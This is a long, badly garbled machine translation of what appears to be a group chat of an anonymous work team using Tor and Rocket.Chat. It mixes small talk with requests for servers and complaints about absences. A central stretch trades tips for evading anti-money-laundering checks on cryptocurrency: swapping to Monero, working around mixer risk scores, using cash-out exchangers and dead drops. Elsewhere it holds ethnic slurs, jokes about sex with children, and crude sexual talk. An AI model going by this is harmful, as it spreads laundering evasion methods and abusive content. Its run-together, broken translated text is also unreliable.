i've seen him before, he has an aux output or something like that in a budget`https://www.youtube.com/watch?v=SINjsb3plWI `but so and dick scored))) I once looked all sorts of attachments, so that the "whole house" does not have to brand, with zvkosnimy something like @Garfield now sekMichel Sebin on the letter ` connect it in `...` deleted the linkthis guy found it, and what a beginner on the guitar advise in general ? I don't have any problems with my hearing, even in terms of "home" vocals. studied at the music school, but not strinahi like that look at what he plays as a cannon playstocenimtam normal guy) in ls throw) aha) find skinumandy *oyi he took the soul of some young sanda there))) there and kveik he fucked up, and worm jmik, and contra with dendia remember in let's get married he was invited to shan tsungav let's get married)) but should know who is close to this subject also on electric guitars etc.д.The main thing is that he is a good electric guitar player, and he played at a hockey match I don't know his name, but he plays like a true soul, the guy's playing the guitar and he's good at playing guitar) he's just a good guitarist) well, the judgments are abstract)) nah, hammett is one of the virtuosos of our time ok) i don't know who he is) and his place was taken by Kirk hammettmastain was kicked out of metallica or something)) i dont know, i listened a long time ago, I listened a long time ago, but I liked it, I just remember it with a secret place, maybe by secret place you mean trust?megadeth band, yes there lyrics like)):)so i fell out, what is the power and the man respected? 
\they were not fuckin' guitarists at the time the lyrics are so-so it's not a secret play called the fuckin' theme balladmegadeth they have a song i kinda liked itcrete place uncle mastain i love and respect megadethmochoch bro power if you're playing) duke nukem theme i remember 10 years ago picked up this how to learn it and it's in the bag i can do anything, I can do it all, but the main thing is not to be lazy. I always wanted to learn the strings, and I just look at it sometimes and blow off the dust (and another one coming up just 2ogo I have a masterful guitar for 2k baa can you play a Chenit from Kveyk?i've been playing guitar for 15 years and i'm self-taught, i thought about starting with something simple i wanted to study too, but in the cave of the mountain king to learn how to play the piano))) 6 years music school, keyboard self-taught, i can't read from the sheet to read on the computer keyboard now i just work on my material, you know what's up?i'm also in the past) i've just recently put together a hobby, i'm just a musician myself))) \Fucking hell, they're everywhere already \https://www.youtube.com/watch?v=sQiD90jfKYE` rofl:rofl: i'll go listen to koko keyboard with danya milokhin on youtube and i have a phone)) who is it bro?) i hope they drink there? 
yeah i see mik and jim from the slips fucking riffs in some interview=) let's listen to what kind of music?I can not understand what is the point of this action, these people were identified by some psychologists, boring people from work, go with a beer can bought and drank near the pub, I have a friend who likes this 2-3 cans a week, I do not understand these people)) just turned around and over) and here on the third monitor chat opened just wanted to listen to a couple of tracks without distractions) no, alkgolism is when you booze for two or more days you have an interesting conversation here)fuck you flash)) you live out of time 10 minutes for a couple of seconds this is a verdict based on my childhood friendeboek is already dakajday on 2l beer I think not there how to classify, alkgolism is a couple or three cans of beer a week, is it so? Or am I confused something2 days booze it's overdone so you can really drink in short there is no one who does not drink so this year, will stay home most of the family work, someone has a family I do not mean that they are what kind of alkars) just drink with or without reason will return soon here either you with them, I'll be away from you for 10 minutes, you can't have a hangover. For example, today I drank for the second day, and before that, it's never happened, i have a social circle that includes a shitload of bluebeards, sometimes alcoholics - it's necessary) everyone drinks as they say just everyone i know i started working, got a family, i left my friends bluebeards long ago you can not even imagine)) the fuck you got in a society of alcohol-maniacs)) and i did not want to die a virgin it was crazy i used to not drink at all it seems to me unreal, or move, because everyone drinks all over the placeBut methinks how, seldoma how to relax without alcoholic beverages tomorrow, read today I'm going to update, if I can.....i have to change drinking for sleeping instead of drinking, you just have to have a rest. 
this year you have to change everything, you have to give up drinking and rest. it's true, all irritants have to be ruled out at once, while you are sober))) methods according to your tastes:I don't think I'd better relax, you may light a light bulb and ace the word stop in your head)) I don't like strong alcohol and snacks, but be careful if you don't have an ace up your sleeve, you can't drink =) but you should touch something sore or you'll get into a fit of rage, that's it, the price is fucked up, not like the price of oil and gasoline - so it's not right)) roughly speaking, they take alcohol =) so it's true that they distill it from oil so I'm a calm and kind-hearted man) vodka has become hard because it needs to be so. it is originally alcohol diluted with water. I don't know who and what started to dilute it with water, it's a tenth thing and I haven't even started drinking it yet) Jack Daniels costs dox and I'm too sorry to buy it. It's not the degree of alcohol that affects brains like a tumblerWater is a harsh swill40 is dangerous for me Mostly 25-20 I drink max 30))) Fucking tincture40 degrees is tincture =) I don't drink vodka You won't get over 250 rubles in buy more in QR:grinningthe most fuckin' tincture is a Ukrainian production Pervak without a snack the whole liter tried it I said let's try it then I remembered about the tincture I said let's go to my place for a couple of hours and then go home I remember I invited a friend I hid the alcohol sometimes better than any other valuable property =) but the tincture on the macadamia nuts - a fuckin' topic I don't know I'm not an expert here they say natural production the alcohol was natural the former owners worked for the pharma production That's why they hid the alcohol in Ethiopia. There's nothing to ferment it and it's the first time I've heard about it. 
I don't understand the ageing of alcohol, I'll write down the recipe: A guy in his old private house dug up a 3-liter can of alcohol, it was in the basement, and he bought an old house, the 70s. I've never tasted anything like this before, it's like a vitamin) They'll come back to hang over, will they bite too? And if you get them drunk on tincture?I've been drinking it all year round. I'm going back to the question of where to go, to Ethiopia but the natural product costs as much as an airplane, the more it costs the better it tastes, you fill it with sugar and macadamias nuts together with the skins, buy some good vodka (absolut for example), or if you have access to normal distillers it will be even better I can only advise you) you know what is the best fucking recipe for a good drink?)my verdict - shit))) like bourbon I remember the first time in my life I tried Jack Daniel's, sweet and sour taste, it's basically the biggest plus that it does not require anything at all, but I have not tried it bourbon?i will look up on googlea but i did not drink that stuff i did not classic jim, apple)) i will have to steal apple juice from my daughter) i ran out of pepsi) i still have half a bottle left i drink william (spiced) Jim Beam 1l ends with me)) i drank a glass of shampoo, sat for Youtube and went to bed sober for the 1st time in 2 weeks decided to get high) this is true in nature "what does not kill you makes you stronger" now i let myself, i'm drinking whiskey i thought i would never live to see the light of day, especially in the last 2 months. i have had the most fucked up year. i feel good now. i wish there was something to copy from. they're all copying. they're all lazy. i understand that this is bullshit in terms of the law. If someone somewhere once handed down a verdict that was needed and it was immediately accepted as a precedent, then all the other decisions will be identical, without even thinking... 
That's what I'm saying) our laws do not work) even though there was no topic on Caucasians. I told the same thing in court :grin:Next time you should say so: "churka" - this translates from some dialects of Caucasian languages as a sparrow. I'm proud to be a "software engineer-extremist". Fuck that. I'll rewrite everywhere. I'm in the process of registering myself a foreign phone number.:grinning:no, in the vk left a commentdirty plutonium bomb tried to set in motion or what?)) in the end `terrorism` was reclassified as extremism, because everyone just went bald from your ideas?) yes, me too. and if the penalty 10 kop, then they will fuckin' accept it directly through their portal. ))) which was recently )10 kopecks more and there will be a fine for extremism, property and other bullshit through this portal once a year I pay my land tax, I changed my driving license in summer, created an application on the state tax, I came and waited in line for 4-5 hours. Dear users! For technical reasons authorization is temporarily unavailable. We apologize for the temporary inconvenience.`https://gosuslugi.pnzreg.ru/` The porky portal is still smoking :grinning:I hope this portal will die) such a service :grinning:Fuck ever such and where ever there will be... 
it's unfortunate, i saw it as a joke recently: in the revival of serfdom you can find out who your lord is on the portal of public services for all we need a principality where everyone will respect each other, and most importantly where the laws will be respected we need a principality, in which each of its residents will be a boyar)), however, as always, Yes, this scribe is creeping up by leaps and bounds, there's no doubt about it, but the conditions here are more or less, but everything goes to the final point of no return, my two hairs on my head) as everything is tight hereRussia is the best country in the world, just trust me.But I do not feel it my homeDa no, I'm just about the pejorative name itI love my homeland The motherland, I have nothing against itDa, it is so salty, and there are sharks Do not offend our homeland, it still Russia)preferably in a country that has no relation to russia Where can I get out of rushki?) Well, it's like if it's freezing, it's lights out at school, but everything is on the street immediately from the morning))) by the sea in 50 meters) tough))))) I was a kid how you found in the closet at my grandparents all kinds of coats, boots, in general, "trunk" of warmth of the war, in199 .. what something, itself in all it was wrapped up and has told that to me it on frost and has gone for a walk one in a court yard, in a snow to roll, from a hill to skate... and frost rare -35-38 somewhere was (the Volga region). Well in the end I was told later that he goes to school that way - it's warm, what the fuck are you doing? I had to say that I was sick))) fuck, and where do you hang out there that?)I had already forgotten about it, look at me):grin:i remember when i was 14 i stole my grandfather's gun and walked around the countryside shooting pheasants. i fucked nature in summer it was hot and in winter it was fucking cold in Amur region it was the far east in 146 socks and felt boots. 
i was small, wrapped up in 100 sweaters and 50 fur coats. it's true, where one can test their strength, that's minus the max.40 tested chilly are there any mtb bike fans ? there's no one who's smartDima, your advice helps me and rocket more than ever :D it's such a reminder that nothing is perfect since the last update of rocket@kermit just do not respond to messages) it's funny, but there are no messages since the rise of rocket at all. it seems to have been a long time ago, it was not like that in the January 5 general? also noticed today? @all guys, what's wrong with the rocket? why messages that were repaired to the message remain in the history, so the dog hears a stranger barking exactly 2 times. if it does not help - goes into an ambush. chair-table-cabinet-cabinet and sits. You know, the thief is looking for the dog underneath and he rips his head off from above. one friend said that you must have a safe door and a Doberman, otherwise there's no way.yeah, such my cat-behemoth would eat in one go my ex-chairman of the club of dog breeders trained guard dogs in this and 5 will not:grinning:hotdog doubleHotDogada even just a dog of 50 pounds not a guard. will not mess with it - will be very bobops to get. and train. no one will try bombs from the new year, do not forget to throw in the entrance - it will be more fun) and now probably somewhere. 
plastic window on the back side of the profile is drilled against the handle and opens with the same handle))) previously, window shoppers could easily break into homes, and when they broke in, it was always on a tip: nobody gave a shit about the lock somehow, no one ever got in, I'll go close the lock ))) something boring, they knew who lived there.... :rolling_eyes:When the door is open, you are waiting for someone. And once you wait, by the law of life - no one will come. Lifehack)) Well, how come? I do not lock the door all my life, it's a habitThe most valuable thing in my apartment is me! If the door is strong, and the windows are made of glass, then ... The door must be strong, or else. Just not just the door))) never understood who puts the door for who knows how much, it's a red rag on the bull bluetooth )At the same time, with a clever look 5 minutes drilling gas concrete (which is a spoon to the tea ...).And we'll put Xiaomish lock on the fingerprint, we're not a shithole :Daga))) and titanium keys )There and the lock should be titanium I fix everything around the ruin))) I have my mom's engineer on the foam everything, foam is blue duct tape 21 centuryDoor is titanium, no one will pass ... But the right two nails, at best 8mm, and the left))) The rest of the foam))) So to speakTo be reliable ...)) Especially like companies that sell titanium doors for 100 + K, and which include installation and warranty. But the installation is done on the foam...I don't like it, Veldon, I'll soon have to do it all again, I figuratively) the usual shit smokes in the hallway (junkie ex, he understands 1 language - "IDISH") Well, in fact, on any rem work find shit after brigade eh, I would stink so bad at home )))) in the bought crib changed the front door - because it blew and stank in the entrance was (neighbor-grasshounds are fucking), so the door was normal, but ramshut with javshan put, the door turned out to be fine BUT the ramshut and jashashanu put up. 
in the grooves of the foam plastic punked and nepinyli on top of a natural guide, like a box does not leave the employee without control, you come and see if it will do the mind, the normal price150 rubles took for advice) 20Krub for work (if he do budit)electrician just came - 70 meters of cable said one room) power 2 wadrat took, well the meter should look at).a how much copper cable you bought?the discussion just don't give a fuck about nails in the wood, knots and whatnot, and bolgraka itself cost 4Kmany take sprsoil for 2500? If you buy one, you'll be the first in about half a year) I took a disk for a grinder to saw wood, the man told me - take this disk (cost 2500) because without hands it is more expensive to liveAga a complete fuckin' cutter, but we are experts in all areas!i know how to saw a wall with a grinder))) with a disk that costs more than a grinder, so as not to kill myself i did it with a grinder, but it's ideal Butt cutter would help) and connect the original wagamy cable take with reserves put wiring in a corrugated!i wanted to change the doors, so i stumbled upon a fucking soviet socket, and i'm sure it was aluminum core as well!)no, you should try to do the wiring properly, it'll cost you more later. Fuck, the bitches did the wiring in the wall before me, and the motherfuckers put it under the linoleum! I would have done it for sure! :)I have 1 cable in general on the surface of the walls) Oh, and what's wrong with wiring on the diagonal? :)oh, our lazybones enough who think - Oh, and what's wrong with wiring on the diagonalYutub bro teach not only wiring to change) yes, I do not like ravshans and jamshutovam in fact cable, hammer and stuff for razvodkin twoshkmenya wiring for hire someone or stremno, as once I had to penalize after the work of the gang budaki hands izzhopyna one room? but I did it myself somewhere near 15K per apartment, how much is it about?i changed the fuckin' cheda? what's yours? 
colleagues, who changed the wiring to copper? hello:nerd::construction_worker::vulcan: good productive year everyone always ready) hello.:zany_face:Hello all! Ready for battle :)Hi, I'll join late today, 16:00 MSK what's all the hubbub? https://www.youtube.com/watch?v=NTiFIdSzaSI ours)nashaveldon not yours for nothing ... whiteshaka nasha jest neverOh, batey, there it is! veldon where? No kidding.and it's not crosses+++agree! belorashka good country.Ok, question removed.)))))))))) Come on!!! Do not swear, we won't. And? @thomas What? so No. and why he Oh, the steamroller, Awww.Glad.Hello brent, good to see youTomas, pedalsThis is -Tomas. He is a steamroller.) Paravozik) +Git is still there? I do not have, I am also waitingGit works? went away. will be back within an hour: vulcan: who had it so that the settings elektrum slipped? hype hype hurray)) Productive week all! HOORAY GUYS!+Good running, running brots who have not yet received - write to pm:)what a pain in the ass ! Guys, loosen your frenzy !)I am out, sorry)) well, I hope so. the second day today, he was only a day away) Force Majeure probably) whether something happened, usually warned if he would not be his donut - long time no communication with nimon the mostagasezar or what?and who knows where the hof disappeared? what is the scheme? 
as usual you can create a wpn + tor-browser and `https://www.bestchange.ru/` ??? really, as in a hole fell through) for BitKoshDosiliDosil ((and immediately disappeared :) @all Dear colleagues, you can start :) Throw at once kosh and the amount in btz, I will admit there by zp? no bitcoins, but you hang in there I do not know where the correlation ...))https://kod.ru/5885/ As 90% of the bitcoins are already mined, pure bitcoins - a myth, imho ... Cases were, the last couple of months is 1-2 people who have such problems. But all seem to solve them, leave a little more percent of the exchange and all the norms. The answer is the same, Chef says that in part yes, but now is a very strict system of verification - and just what the exchange does not like they can lock your tranche. Many exchangers either just return the funds, or protyat additional 5% for withdrawal from the origin of funds but it has nothing to do here...by the way, under Mars and fell, after the update - normne Mars vpn what do you? (I have a mars)no, just the vindo-version at hand11.0.2 (based on Mozilla Firefox 91.4.0esr) (64 bit)encountered only in the vindo. men, I do not know what to answer, but were "Your tab just fell down." and after the update - did not fall tabsI in 11.0.1 fell tabT.i.e. in 11.0.2 repaired already, does not fall down? but it was, in the wind, in the last version of the tor-browserThe second tab does not even hang for 10 sec (your tab just fell down.)i had no problems with chatting latelyOverly falls like i do not know what ...I don't see any problems with chatting todayChat crashes hard, tor is stable on the netwatchwatch...i have updated and working stably i don't see any problems so far, it works like before, but i have tor browser without update...the same thing i have to ping.. the very tor works differently, imho(thx + tessnetu me one today chat constantly knocked out? shttp://audia6.best/a can you give a link....? audit the same, etc. 
no questions. where to send what, which exchangers? hydra is down, because tor isn't working, there won't be any bobs in the treasure :sweat_smile: :rofl:
well, in Monero) Not the point, AML and other stuff only on the official exchangers with huge commissions)
In this scenario you need a bum to go and get the dough in the Tink exchangers; with Tink QR you can withdraw and the percentage is less than at bestchange))))))
in the countryside: if there's a corpse in the country house - it's yours, if oil - the state's
No, if they catch you digging, you say you're looking for treasure, though it's 25% already ....
I never understood the law, but there's so much money (Or how much is it... 25%? Where are you going, honey? - You won't believe me if I tell you), and you'd officially find the treasure, but soon we'll be looking for money in dead drops)
Add to that the problems of banks that check transfers. They are strangling our brother!
They didn't invent the "NFT token" for nothing, they need to think about this laundering variant..
The crypto check is very crooked, and only gives them an excuse to screw up and take the dough.
Transaction in the middle risk zone 👆
Risk: 59.7%
Detailed analysis:
✅ Minimum risk
- Exchange ML Risk Low - 5.2%
- Miner - 1.6%
- P2P Exchange ML Risk Low - 0.4%
- Payment - 0.4%
- Wallet - 0.4%
⚠️ Average Risk
- Exchange ML Risk High - 6.5%
- Exchange ML Risk Moderate - 18.2%
- Exchange ML Risk Veryhigh - 1.9%
- P2P Exchange ML Risk High - 4%
⛔️ High Risk (Volume: 0.27675881 BTC ~13183.01USD)
- Dark Market - 2.7%
- Exchange Fraudulent - 0.5%
- Mixer - 56%
- Stolen Coins - 1.8%
Warning. Since there are high-risk sources in the results (Dark Market, Dark Service, Illegal Service), we recommend 🔬 Investigation regardless of the overall risk assessment.
There's a blacklist of coins - let's say there are several transactions backward in the chain with these coins, but this only applies to those who sent and received coins exactly in that transaction; for the rest of the transactions it is not known what for - and the system immediately considers all subsequent ones dirty even before anything has been done with these coins)).
Ganesh, what were you doing with the wallet? let me tell you about one nuance. I checked with AMLbot, I really had a 100% mixer risk written, and I exchanged BTC for XRP, but the exchanger blocked the application and said he could return it after verification, because I had 100% risk. I don't know if it was 100 percent risk, but they'd have returned it with a commission and without a Raiff.
Monero and XRP in the same sentence is fucked up, but the AMLbot site has a list of participating exchangers and they don't have Raiff or anything else
[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=d3nYGSpfa5Y35yyphz) yes, or they took a decent commission for the refund too
topankiya wanted to exchange for cash yesterday at Baksman, so the support said that you have a 100% risk and to get a return you need to be verified ))))
the amers are now blocking exchanges again for some reason, and they
I don't know if it's a good question about cryptocurrency purity, I've noticed it quite casually, but I haven't checked it at all before. But the exchangers have never checked for dirty cryptocurrency.
I bought pot, threw it onto the seller's wallet, and now your wallet is blacklisted. i wonder what will happen next, in two years? wasabi wallet is blacklisted. that's why i brought up this question...
maybe it's wallet transaction analysis, and there's a blacklist of wallets. this is just a kind of traffic-circle fuckup.
this is how they determine purity - Crystal or AML - it's their subjective opinion, the wallet doesn't say what exchange they're from
Any group has its own mixer; a year ago the answer was - "it's a very good question ..."
I understand that this applies to wallets which are tied to the exchanges ... purge. Where do you get it?)
@frances, Bro, tell me, do we have some kind of crypto purge? What's the point? Couldn't he look in the blockchain?))
from the point of view of mathematics, and mine)) - there is no pure bitcoin left; some exchanges write more than 40% bad
exchangers don't write in the rules that for them pure crypto `must be checked on amlbot` - I checked the wallet, it shows 56% for example (average risk), and then what is good or bad is clear, but there are different exchangers + mixers
a roundabout through the exchanger: they check your bitcoins all the same. i change to monero. it's probably better to change everything to monero
why do you use one wallet? i always use different ones. i need to check on amlbot. not if the hash has blurred the deal - my changer asked for the hash of the last tranche, only after that he agreed to accept the money, explaining a fear for his own wallet's location. i felt sorry for 300 bucks somewhere, i just returned the bit to another wallet, but i haven't contacted them again
check the hash from the wallet you want to verify: better check the transaction
3 months haven't passed yet, waiting for what it will eventually be http://amlbot.com/
I have a question, can I verify the transaction myself? I have a question, can I check the purity of my bitcoins myself?
Well, as they write in the rules, they can also send you to the authorities) you'll be sent to the forest to get a bot, and if it shows that your crypto is dirty, even in previous transactions
One exchange came across CrystalBlockChain. In one exchange, CrystalBlockChain refused to change my bit, but that was in April, what's the point?
it's not a throw-in, i got screwed by payroll a month ago. bros, who has met this throw-in, the crypto-men started some kind of AML check...?
> although on the git they say yes
It is written that version 0.2.13 is not susceptible
everyone needs to be vaccinated, then the connection will be better. i'm injected here, and it catches even without internet
very likely)) this is a promotional move for the release of Matrix 4
hmm, for 3 days i observed a "quiet loss of connection" with rocket, i.e. i think i'm in the chat room, but it's not true(((
@angelo, look at your jabber, plz! hi aLL
although on the git they say yes, it's not fixed
i'll be in a couple hours
the group chats are being worked on
mattermost is proprietary, we're betting on tox
https://security-tracker.debian.org/tracker/CVE-2021-44847
@silver https://blog.tox.chat/2021/12/stack-based-buffer-overflow-vulnerability-in-udp-packet-handling-in-toxcore-cve-2021-44847/
in tox messages only arrive online; mattermost is a good alternative, they're developing it now: video, from what I hear. it's just that tox is bad with group chats
thomas++ :thumbsup: + a couple hours
nothing to post, please. Let the message be read and it will fall into history.
If somebody needs something for personal affairs (it happens), he is obliged to warn all those who work, in the working channels - "I will not be here tomorrow from ... to ...".
If a person is absent without a valid reason (illness / death) - minus half of your salary this month. Repeated two times - goodbye, regardless of rank and merit. An hour passes, two, three, he isn't there, deadlines are disrupted, customers resent and curse us, a man is missing, he is not there, he is waiting for the guys. We have an extremely inefficient way of working when someone is suddenly not at the workplace.
@algitler kaput, Stalin gut) yo, genau) guten) morgen)
fail2ban just in case. Somebody was guessing passwords on one server, managed to log in -- a bunch of sshd [defunct] processes. didn't open the main page at all. dns.. down for 12 hours since morning
tex, the deinserverhost.de hosting is up. PMS, he doesn't have VPN
it's baidenugu (looks like everyone got kicked out of the toad)
our mars works, I sit through it now
thought rosompozor is weird with VPN blockers. I have a VPS there with VPN not responding
http://deinserverhostde/ seems to be down
I don't really understand this correlation. Our prayers (yesterday). Weird... Where's the logic... A miner stops mining, it creates a shortage of crypto, it should go up... Oil is getting cheaper, gasoline is getting more expensive... the exchange rate in UZ and our sector in the fund have also dropped sharply... I don't know where the bottom is...
So bitcoins went down? Now they're shorting crypto and the stock market hard, they have 1/4 of the world's miners... Kazakhstan was 2nd or 3rd in mining. Kazakhstan = bitcoin rate? +++
ok, just finishing the registration in 30 min!
debian 10 for bk. need 10 VPS for collin
hi, write as you can
hi! hi there https://www.youtube.com/watch?v=HV7sjEDlMKs
good, good night guys! all have a good weekend. it's Thomas, I also know who to write to if anything )
I'm an old grandfather today and it's time for me to go to sleep, it's time to hit the sack. infect angelo) no problem. Now I'll know who knows about such gizmos))) if I suddenly get a similar device I'll definitely think about it and consult)
and this is purely hardware, to be able to do similar outputs. sammit nekrotikno: to anonymize the Internet it's better to take a MikroTik. a classy thing, he certainly hasn't held it in his hands. MikroTik is a cool piece of hardware, I certainly haven't held it in my hands, but I've seen many articles on planning an anonymizing network. quickly crushed it in the bag, crushed it, and it turned out very well. I also grabbed a touch-sensitive display for it in DNS; bought the 4th version in DNS, also saw it there. saw a funny video where people coded on a keyboard with only 0 and 1 keys. by the way, not so long ago I came across Raspberry Pis on Citilink, have they been on sale there for a long time?)) https://aliexpress.ru/item/4000050394000.html but the quality is unknown. for a couple of inputs, without graphics, with the console it's enough. here you can argue about the size, the only thing is smaller, I don't even know which is smaller?)
Arduino then malinky) @hammer while broy all so far, only I left good night and have a good weekend http://youtu.be/j_5XhBzMcQM?t=139 here's about that reel with the kitchen and why so happenta old hardda - such ooldy, I 5 shots have time to drink drink to pass out, sleep and rise again wanted to see T34 in 3D, it turned out there is no it on the old hardda anywhere I did not run away so fucking screams at the end))) flame I remember exactly what the fuck it fucked up from the squirrel how it so fucks it is not gasoline near the stove and open flame the smallest sprays of oil and water, everything is proven but it does not sound good and there was also a post on pikabe about why it blows so good the flame really fucked up the ceiling but i remember that i fucked up so bad i remember it to this day how i did not throw it out of my hands and shit i do not understand i had water in my oil and i ran away !like this guy) yes Eliot, we all did a fuckin' thing! Trance://www.youtube.com/watch?v=0pVnFoIyg5cмоим thank god it was over) found a video about the guy) if you catch it before the neighbors call the fire brigade) fuckin' stimulates active recreation and all the walls in flakes of soot and it was coming to the parents) teenagers in virtual work the kitchen turned into a cunt in real life, I was a friend of a friend of mine. But when I had an epiphany, my friend was running around in a fucked up state, because he thought of burning magnesium right in his own kitchen... I love him. Eliot, look at him, he had a friend like that. Everyone had a fucking friend like that. I remember the friend said, look closely at the light. 
it was magnesium with sulfur, i fucking thought i'd go fucking blind)) the can was on fire, you take it with a stick and start twisting it over your empty head you thinkers then)))))) you're lucky you poured it on your headHammer threw up a beautyһttp://www.youtube.com/watch?v=iRhs6ZZAGsA&ab_channel=%D0%B0%D0%BB%D0%B5%D0%BA%D1%81%D0%B0%D0%BD%D0%B4%D1%80%D1%86%D0%B0%D1%80%D0%B5%D0%B2%D1%81%D0%BA%D0%B8%D0%B9тут уже горело охуенно, настолько охуенно, that I lost half of my outerwear and a couple of pieces of my body surface)his next idea was a can of paint and a future employee of RUSNANO !turned out to be nothing special):joy:I had to burn the fuck out of it. i remember only sixth grade and my buddy who used to tell me that when shit burns, it's somehow especially goritnostalgia is blind and not objective in relation to the object of nostalgia )and this too, by the way )burning paper covered in shit?i got nostalgia for shitting in the woods Fucking hell, a fucking bucket of shitty paper would have been better burned and you can't flush it down the toilet with your hand and then on the snow, it never felt so fucking good with the newspaper Who the fuck is a herd? It was fucked up before the era of toilet paper. I remember rubbing it in my hands and my ass feels good Not so, guys, sometimes i get jealous watching... at Silver's stamina... he's a real herd-head...i haven't even held it in my hands in 10 years) but i don't give a fuck if i read a paper i thought it was a paper, but it didn't come out where i clicked the link, it came out, i read a newspaper and a hohlian one too) you know, once they write, they can't even read. 
i read a hohlian paper today, a guy there said, I often have contacts with officials, in the government of Ukraine they can't make five sentences in a text, even if they are like Ostap Bender, do not confuse it, this is how we build ford roads, fuck you, I do not know how to play chess (if I beat Angelo with black from you, then your green flows to me:stuck_out_tongue_closed_eyes:it better be nhl who won?it was a couple weeks ago elliot and i are waiting for another one) who played that one?)welldon yourself play))))))))):rofl:or *payments* like *chess*, some kind of built-in toy would beWeldon help me out here. I can't. Guys, let's wank and continue the high-interest conversations. That's it, we're talking, now i don't even want to eat now i don't even want to eat more functional attributea your ass than your tits, 3 on your ass then 2 on your tits size 2 is idealsam not likesiksiks big not like prosecutor put 5 kilos on your tits) at least 5 kilos, bossa wellooooo it's normal he's a fucking pussy):You put a dick in her, you'll tear the skin on her belly. Have you seen 177 and 50 in person??that would be awesome guys. 177 and no more than 50. I want a brunette about 18 years old.and food - it's nothing I'm not used to, all by myself, with my own hands uncomfortable is when your prostitutes will start to order youHow uncomfortable, from the couch ordered all that you need and all:D uncomfortable but want to fuck as if to order prostitutesdostavka for foodthat for the fashion such?! My, my started ordering food with delivery) Stolypin vaginas?vaginas put out fires what kind of vaginas light vaginas? what else vaginas? 
vaginas unload vaginas do not burn out I'm still here and see everything !:grin: I remember in real life New Year 02 or 03 ) that's where the whole vagon burned out):joy:Fire this guyOut?I can't find the guy who used to represent cute girls instead of sheep, but I like commercials :joy:it was exactly righthtp://www.youtube.com/watch?v=1zgJnOXsBlY not and sheep about psa remember the video?!fuckahahahaha for all the oldies))))))))) you watch, i'm about to start asking questions like "would you fuck a sheep?"))))get it, from who is this tendency i read and it starts itching in my groin of course elliot !well what kind of people are all our conversations reduced to fucking and wanking it is because we are so fucking good, i guess? "knock it off, i'm 33 years old and still a virgin." "no, i have a girlfriend... "her name is Rosa... she's standing on a windowsill, winking at you all":smiley:so what else can i say) i can't remember the name, two years ago it was before the fucking covids - the best cunt cheese! "white-yellow-orange, who doesn't know that!i'm gonna make brie. i want my own, fresh, i don't remember the name, the white-yellow-orange one i tried, of course i don't mind spanish cheese either. What kind of cheese is that, no moldovan, Georgian or armenian? It's easier if it's soft. What can i do if i can get really good cheese and good cognac there? i'm a gourmet.If you can buy really good cheese from France with cognac, you can't buy fucking good cheese and I'm sick of buying cheese, it's bullshit, I've tried my best to listen to him, but dumplings fuck - the whole kitchen is full of flour, i'm like a schmuck, dumplings are like the dumplings of an old french prostitute in a bar) it's like jerking off, only the result is different and for a long time i couldn't help myself Turn on the movie and mold myself as a kid, now my fingers are not the same ..... 
all on the keyboard and on the clavette I really could hardly buy somewhere would be fuck knows you won't buy it you need to love life very much to voluntarily do this shit not once !buy it is more reliable, I'm sure once molded in the freezer 5kgs mold yourself a pelmeni already eh fucktastic I'm a log cook - now *BMZHIRAC* brew :smile:they have nothing to say if not pisichka:rofl:log cooks also have everything not only a log, but also a log-coder? they are not only able to be a log girl, I've even heard here long ago) even ! even female programmers {slash yeah, I don't know what I was saying there}:joy:yes, they have comments in the code like that, lezginka, taz, all that shit, I mean our, condos=) blackcoders Of course, such an immodest question, I hope they won't beat the fuck up... there are khachi-software guys? we need more black music in our itinerant everyday life and you can develop art music here) how lucky you are that i'm sober you can also sing ukupnik no way out, turn the key and fly aiiipffffluentially meaningful forever young - forever gay, who sings?)I wouldn't be surprised if he was still editing April thesesSilver is the youngest, it's me in the course Silvermans are all youngJewish logic !:joy:)))))))))))))))))))) all this is strange.You're here for fuckin' kids again, you're young, you have some kind of connection) @kermit come dear)):rofl:)))) Don't you have a brother in moscow?and all of a sudden everyone became a moron they used to be people like people ageperchy rolls not to blow people's brains out and i already gave up on the punching bag i have a punching bag helps 50 kg i was only 22, sometimes i fuck up)))))) i did not want to fuck up when i was 15 you know how long he was in prison? it's a glamorous and this idea is perfect when you're 15 and you want to get fucked up he was some kind of plush Nazi who wasn't one of us in our youth?! he was a fool, not a neo-Nazi. kids can be different. he was a neo-Nazi but the guy was a good man. 
you cry more from the comments there than from the post on picaboo you often cry from the comments with laughter, you wouldn't find it now, it's a shame.... Angelo, and even TESAKA bemoaned) I the comments rolled on the fuck) on the theme of tourism somewhere in the Thailand and fuck children, pikabushniki everyone thought of other kids fuck)) remember such a hilarious topic on pikabu was in the winter, like 15-year-olds there ogo hoe! I will make a footnote well well catch, tor, all that ...)))))))))))))))))))))))))))chats don't confuse-then you've made this shit up, you can't fuck kids...mine did for two kids and who the fuck knows from who, and you can get jail time for my roommates even though it looks like a prostitute) coronovirus is not sexually transmitted!!! as long as you're on the other side of the monitor:laughing:my roommate, for example, only gives it to the iranian)) no arguments it's so the topic will always be relevant I have such roommatesNow the world is full of fat, pimply men who will never have a reason to fuck their neighborThat's the pandemicWatchat for TV jerks?you should jerk off in real life ! what's the equivalent of a runetki ? what the fuck is a runetki ?msg=6SzdjFCong4vYuaPE) the same guythere are so cute compsvot votaa, well that's more fun, I guess I found the old don't tell him:rofl:what is it?!bongacamsEliot this old mac washttp://static.baza.farpost.ru/v/1629881092363_bullen translate plz, is it something laotian, judging by the name?I was offered to make up something like bongacams say in the pandemic as ever relevant :) yes, I see his fields are black and I feel bad you're all posotrines androids) such screens put in chinese cars like thought something missed. 
It's nothing unusual http://media.s-bol.com/LZzXZ980X0rA/1200x965.jpg beautiful TVs for 100. fuckin' TVs are the same as the old TVs on a leg, a colored one still stands on them. damn, the new iMacs are beautiful peepers. systemically not very comfortable, i'm closer to minimalism.
our students often go to the EU and have no dough left, and what to do?! i'll fuck on camera. so if the kid says he's streaming it's worth checking )) and when is webcamming? all i have is an AMD K6-2 working computer) girls for dough, web cam, where are the babes? there's a fucking fine line between streaming and webcam. pop is a DOS game. i gave him a Xeon for a kid, it was lying around. Now he's got a streamer that says, "Sasha! Change your stinky socks, quick! Well maaaam, I'm streaming!!! :cry:"
